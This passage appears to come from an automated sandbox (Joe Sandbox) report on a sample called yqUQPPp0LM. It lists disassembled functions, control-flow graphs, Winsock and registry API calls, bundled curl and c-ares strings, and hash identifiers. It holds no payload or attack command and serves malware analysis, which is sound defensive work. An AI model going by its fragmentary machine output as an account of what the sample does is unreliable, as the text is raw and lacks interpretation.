                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                        • String ID: 7$@$}
                                        • API String ID: 3271271169-4020994123
                                        • Opcode ID: ef91a6fe1628aaf9d06121a8cc90fd14ab268423555cbad15c76cff2c2a204bb
                                        • Instruction ID: fedb5203a03c2c95a3636f50116f8e26a9028b0883e148dfbffda3f2ac998af6
                                        • Opcode Fuzzy Hash: ef91a6fe1628aaf9d06121a8cc90fd14ab268423555cbad15c76cff2c2a204bb
                                        • Instruction Fuzzy Hash: CED183B49057099FCB10EF68C58569EBBF1FF88344F008969E898D7351E7749A84CFA2
                                        Function 008329FF Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 321registryfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1300 8329ff-832a2f FindFirstFileA 1301 832a31-832a36 1300->1301 1302 832a38 1300->1302 1303 832a3d-832a91 call d01e50 call d01ee0 RegOpenKeyExA 1301->1303 1302->1303 1308 832a93-832a98 1303->1308 1309 832a9a 1303->1309 1310 832a9f-832b0c call d01e50 call d01ee0 CharUpperA call bb8da0 1308->1310 1309->1310 1318 832b15 1310->1318 1319 832b0e-832b13 1310->1319 1320 832b1a-832b92 call d01e50 call d01ee0 call bb8e80 call bb8e70 1318->1320 1319->1320 1329 832b94-832ba3 1320->1329 1330 832bcc-832c66 QueryFullProcessImageNameA CloseHandle call bb8da0 1320->1330 1333 832bb0-832bc0 call bb8e68 1329->1333 1334 832ba5-832bae 1329->1334 1340 832c68-832c6d 1330->1340 1341 832c6f 1330->1341 1338 832bc5-832bca 1333->1338 1334->1330 1338->1329 1338->1330 1342 832c74-832ce9 call d01e50 call d01ee0 call bb8e80 call bb8e70 1340->1342 1341->1342 1351 832dcf-832e1c call d01e50 call d01ee0 CloseHandle 1342->1351 1352 832cef-832d49 call bb8bb0 call bb8da0 1342->1352 1362 832e23-832e2e 1351->1362 1363 832d4b-832d63 call bb8da0 1352->1363 1364 832d99-832dad 1352->1364 1365 832e30-832e35 1362->1365 1366 832e37 1362->1366 1363->1364 1373 832d65-832d7d call bb8da0 1363->1373 1364->1351 1368 832e3c-832ed6 call d01e50 call d01ee0 1365->1368 1366->1368 1381 832eea 1368->1381 1382 832ed8-832ee1 1368->1382 1373->1364 1378 832d7f-832d97 call bb8da0 1373->1378 1378->1364 1384 832daf-832dc9 call bb8e68 1378->1384 1386 832eef-832f16 call d01e50 call d01ee0 1381->1386 1382->1381 1385 832ee3-832ee8 1382->1385 1384->1351 1384->1352 1385->1386
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                        • String ID: 0$w
                                        • API String ID: 2406880114-1919229051
                                        • Opcode ID: 4285e98b7fd33f84650b85e205b5b5ca7a865bc35ff1c676714387d796e2ad7b
                                        • Instruction ID: f5275ee979402ff62c5e7d609f2c99088e3aecaef346268acf474b5629d6eee1
                                        • Opcode Fuzzy Hash: 4285e98b7fd33f84650b85e205b5b5ca7a865bc35ff1c676714387d796e2ad7b
                                        • Instruction Fuzzy Hash: 10E1B2B49043099FCB10EF68D98569EBBF5FB84344F508869E888E7350EB74D988CF52
                                        Function 008405B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1670 8405b0-8405b7 1671 8405bd-8405d4 1670->1671 1672 8407ee 1670->1672 1673 8407e7-8407ed 1671->1673 1674 8405da-8405e6 1671->1674 1673->1672 1674->1673 1675 8405ec-8405f0 1674->1675 1676 8405f6-840620 call 847350 call 8370b0 1675->1676 1677 8407c7-8407cc 1675->1677 1682 840622-840624 1676->1682 1683 84066a-84068c call 86dec0 1676->1683 1677->1673 1685 840630-840655 call 8370d0 call 8403c0 call 847450 1682->1685 1689 8407d6-8407e3 call 847380 1683->1689 1690 840692-8406a0 1683->1690 1710 8407ce 1685->1710 1711 84065b-840668 call 8370e0 1685->1711 1689->1673 1693 8406f4-8406f6 1690->1693 1694 8406a2-8406a4 1690->1694 1696 8406fc-8406fe 1693->1696 1697 8407ef-84082b call 843000 1693->1697 1699 8406b0-8406e4 call 8473b0 1694->1699 1701 84072c-840754 1696->1701 1714 840831-840837 1697->1714 1715 840a2f-840a35 1697->1715 1699->1689 1709 8406ea-8406ee 1699->1709 1705 840756-84075b 1701->1705 1706 84075f-84078b 1701->1706 1712 840707-840719 WSAEventSelect 1705->1712 1713 84075d 1705->1713 1727 840700-840703 1706->1727 1728 840791-840796 1706->1728 1709->1699 1716 8406f0 1709->1716 1710->1689 1711->1683 1711->1685 1712->1689 1720 84071f 1712->1720 1721 840723-840726 1713->1721 1723 840861-84087e 1714->1723 1724 840839-84084c call 846fa0 1714->1724 1717 840a37-840a3a 1715->1717 1718 840a3c-840a52 1715->1718 1716->1693 1717->1718 1718->1689 1725 840a58-840a81 call 842f10 1718->1725 1720->1721 1721->1697 1721->1701 1737 840882-84088d 1723->1737 1735 840852 1724->1735 1736 840a9c-840aa4 1724->1736 1725->1689 1743 840a87-840a97 call 846df0 1725->1743 1727->1712 1728->1727 1732 84079c-8407c2 call 8376a0 1728->1732 1732->1727 1735->1723 1740 840854-84085f 1735->1740 1736->1689 1741 840970-840975 1737->1741 1742 840893-8408b1 1737->1742 1740->1737 1744 840a19-840a2c 1741->1744 1745 84097b-840989 call 8370b0 1741->1745 1746 8408c8-8408f7 1742->1746 1743->1689 1744->1715 1745->1744 1753 84098f-84099e 1745->1753 1754 8408fd-840925 1746->1754 1755 8408f9-8408fb 1746->1755 1756 8409b0-8409c1 call 8370d0 1753->1756 1757 840928-84093f 1754->1757 1755->1757 1763 8409a0-8409ae call 8370e0 1756->1763 1764 8409c3-8409c7 1756->1764 1761 840945-84096b 1757->1761 1762 8408b3-8408c2 1757->1762 1761->1762 1762->1741 1762->1746 1763->1744 1763->1756 1766 8409e8-840a03 WSAEnumNetworkEvents 1764->1766 1768 840a05-840a17 1766->1768 1769 8409d0-8409e6 WSAEventSelect 1766->1769 1768->1769 1769->1763 1769->1766
                                        APIs
                                        • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00840712
                                        • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 008409DC
                                        • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 008409FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: EventSelect$EnumEventsNetwork
                                        • String ID: multi.c
                                        • API String ID: 2170980988-214371023
                                        • Opcode ID: c527e202871f9f345ca1e6689f0d424fb1b0c18f09ef500a9baf238da41fd655
                                        • Instruction ID: 74814b3074dbeb7ee7fbcac9cf1c8aa162c8103350142ed4ef4781250984684a
                                        • Opcode Fuzzy Hash: c527e202871f9f345ca1e6689f0d424fb1b0c18f09ef500a9baf238da41fd655
                                        • Instruction Fuzzy Hash: 8BD18A716083099BE710CF64C881B6BBBE5FF94348F04482CFA85C6282E775E959DB93
                                        Function 00846FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1807 846fa0-846fd2 1808 846fd4-846fd6 1807->1808 1809 846feb-846ff1 1807->1809 1810 846fe0-846fe4 1808->1810 1811 847324-847330 1809->1811 1812 846ff7-846ff9 1809->1812 1813 846fe6-846fe9 1810->1813 1814 84701b-847041 1810->1814 1815 847186-847196 1812->1815 1816 846fff-847016 1812->1816 1813->1809 1813->1810 1817 847060-847074 1814->1817 1815->1811 1816->1811 1818 847076-847081 1817->1818 1819 847057-84705a 1817->1819 1818->1819 1822 847083-847089 1818->1822 1819->1817 1823 847172-847174 1819->1823 1824 8470dc-8470df 1822->1824 1825 84708b-84708f 1822->1825 1826 847176-847184 1823->1826 1827 84719b-8471a8 1823->1827 1832 8470e1-8470e5 1824->1832 1833 84712c-847132 1824->1833 1830 8470b0-8470bd 1825->1830 1831 847091 1825->1831 1828 8471f1-84722d call 84d7f0 select 1826->1828 1827->1828 1829 8471aa-8471be 1827->1829 1857 847233-84723e 1828->1857 1858 84730b 1828->1858 1834 8471c4-8471c6 1829->1834 1835 84730d-847310 1829->1835 1839 8470d5 1830->1839 1840 8470bf-8470ce 1830->1840 1836 8470a0-8470a7 1831->1836 1841 8470e7 1832->1841 1842 847100-84710d 1832->1842 1833->1819 1837 847138-84713c 1833->1837 1845 847331-847344 1834->1845 1846 8471cc-8471e6 1834->1846 1835->1811 1851 847312-847322 1835->1851 1836->1830 1847 8470a9-8470ac 1836->1847 1848 84714d-84715a 1837->1848 1849 84713e 1837->1849 1839->1824 1840->1839 1852 8470f0-8470f7 1841->1852 1843 847125 1842->1843 1844 84710f-84711e 1842->1844 1843->1833 1844->1843 1845->1811 1866 847346 1845->1866 1846->1811 1867 8471ec 1846->1867 1847->1836 1853 8470ae 1847->1853 1855 847050 1848->1855 1856 847160-84716d 1848->1856 1854 847140-847144 1849->1854 1851->1811 1852->1842 1859 8470f9-8470fc 1852->1859 1853->1830 1854->1848 1862 847146-847149 1854->1862 1855->1819 1856->1855 1863 84725c-847269 1857->1863 1858->1835 1859->1852 1865 8470fe 1859->1865 1862->1854 1868 84714b 1862->1868 1869 847253-847256 1863->1869 1870 84726b-84727b __WSAFDIsSet 1863->1870 1865->1842 1866->1851 1867->1851 1868->1848 1869->1811 1869->1863 1871 84727d-847287 1870->1871 1872 84729a-8472ac __WSAFDIsSet 1870->1872 1873 84728e-847293 1871->1873 1874 847289 1871->1874 1875 8472ae-8472b3 1872->1875 1876 8472ba-8472c9 __WSAFDIsSet 1872->1876 1873->1872 1877 847295 1873->1877 1874->1873 1875->1876 1878 8472b5 1875->1878 1879 847240 1876->1879 1880 8472cf-8472f6 1876->1880 1877->1872 1878->1876 1881 847245-84724c 1879->1881 1880->1881 1882 8472fc-847306 1880->1882 1881->1869 1882->1881
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 74523a78c16736b4d437c902c3165246407eada68d884b1b8936bafb534e141c
                                        • Instruction ID: b19c05f0a5036fa1b4683518fa5ca5e1d3d819935432a4bdddf23b1eb2d28695
                                        • Opcode Fuzzy Hash: 74523a78c16736b4d437c902c3165246407eada68d884b1b8936bafb534e141c
                                        • Instruction Fuzzy Hash: B091DE3060D75E8BD7358A6888947BBB2D9FBC4324F548B2CE8A9832D4EB759C40D681
                                        Function 008FB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                        Download Yara Rule
                                        APIs
                                        • getsockname.WS2_32(-00000020,-00000020,?), ref: 008FB2B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: getsockname
                                        • String ID: ares__sortaddrinfo.c$cur != NULL
                                        • API String ID: 3358416759-2430778319
                                        • Opcode ID: e2e6fd0409735e388cf10cf42c4c7407fe4c148eb4d872450a54917a9d83a624
                                        • Instruction ID: 06a7991852179ce961189f40ad67227654751d8af5cbb06b4c2ba0e65d79a201
                                        • Opcode Fuzzy Hash: e2e6fd0409735e388cf10cf42c4c7407fe4c148eb4d872450a54917a9d83a624
                                        • Instruction Fuzzy Hash: AFC15C716043099FD718DF28C891A7A77E1FF88354F158868EA4ACB3A1EB34ED45CB81
                                        Function 008FA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,008E712E,?,?,?,00001001,00000000), ref: 008FA90D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: recvfrom
                                        • String ID:
                                        • API String ID: 846543921-0
                                        • Opcode ID: 04967b58af2b47719a5d59e29a4e1536b8be791c7ea7a5af61dd6f5e7b0145b8
                                        • Instruction ID: 6a8f90018a5f397217d49a4c16fedda49bd95b27f446318aaea3602074cbbb59
                                        • Opcode Fuzzy Hash: 04967b58af2b47719a5d59e29a4e1536b8be791c7ea7a5af61dd6f5e7b0145b8
                                        • Instruction Fuzzy Hash: 43F049B520830CAFD2109A11DC84D7BBBADFBC9768F05856DF95C132118270AE108AB2
                                        Function 008EA440 Relevance: 48.3, APIs: 17, Strings: 10, Instructions: 1066registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008EAA19
                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008EAA4C
                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 008EAA97
                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008EAAE9
                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008EAB30
                                        • RegCloseKey.KERNELBASE(?), ref: 008EAB6A
                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 008EAB82
                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 008EAC46
                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 008EAD0A
                                        • RegEnumKeyExA.KERNELBASE ref: 008EAD8D
                                        • RegCloseKey.KERNELBASE(?), ref: 008EADD9
                                        • RegEnumKeyExA.KERNELBASE ref: 008EAE08
                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 008EAE2A
                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 008EAE54
                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 008EAF63
                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 008EAFB2
                                        • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 008EB072
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000130D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470960835.000000000130E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471155700.00000000014C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2471175093.00000000014C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: QueryValue$Open$CloseEnum
                                        • String ID: ;m$DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$ck
                                        • API String ID: 4217438148-345610589
                                        • Opcode ID: 4820e49823f4740f8dcd5916c7e3a23d34027effddfdda1743ecaa0cb06ba597
                                        • Instruction ID: c955a7f9d221f594adbb46ed26bfdb0d653c7828a8eace5f3e5ed9d2341c9d97
                                        • Opcode Fuzzy Hash: 4820e49823f4740f8dcd5916c7e3a23d34027effddfdda1743ecaa0cb06ba597
                                        • Instruction Fuzzy Hash: 4F72C1B1608381AFE7249B25CC81B6BB7E8FF86B04F144828F995D7291E771E944CB53
                                        Function 0086A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                        Download Yara Rule
                                        APIs
                                        • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0086A831
                                        Strings
                                        • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0086A6CE
                                        • Local Interface %s is ip %s using address family %i, xrefs: 0086AE60
                                        • Bind to local port %d failed, trying next, xrefs: 0086AFE5
                                        • bind failed with errno %d: %s, xrefs: 0086B080
                                        • cf-socket.c, xrefs: 0086A5CD, 0086A735
                                        • @, xrefs: 0086A8F4
                                        • cf_socket_open() -> %d, fd=%d, xrefs: 0086A796
                                        • Could not set TCP_NODELAY: %s, xrefs: 0086A871
                                        • @, xrefs: 0086AC42
                                        • Name '%s' family %i resolved to '%s' family %i, xrefs: 0086ADAC
                                        • Trying [%s]:%d..., xrefs: 0086A689
                                        • Trying %s:%d..., xrefs: 0086A7C2, 0086A7DE
                                        • Local port: %hu, xrefs: 0086AF28
                                        • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0086AD0A
                                        • Couldn't bind to '%s' with errno %d: %s, xrefs: 0086AE1F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        • Associated: 00000000.00000002.2470029910.0000000000830000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000E10000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470058848.0000000000F78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470621313.0000000000F7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.00000000010FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2470638921.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
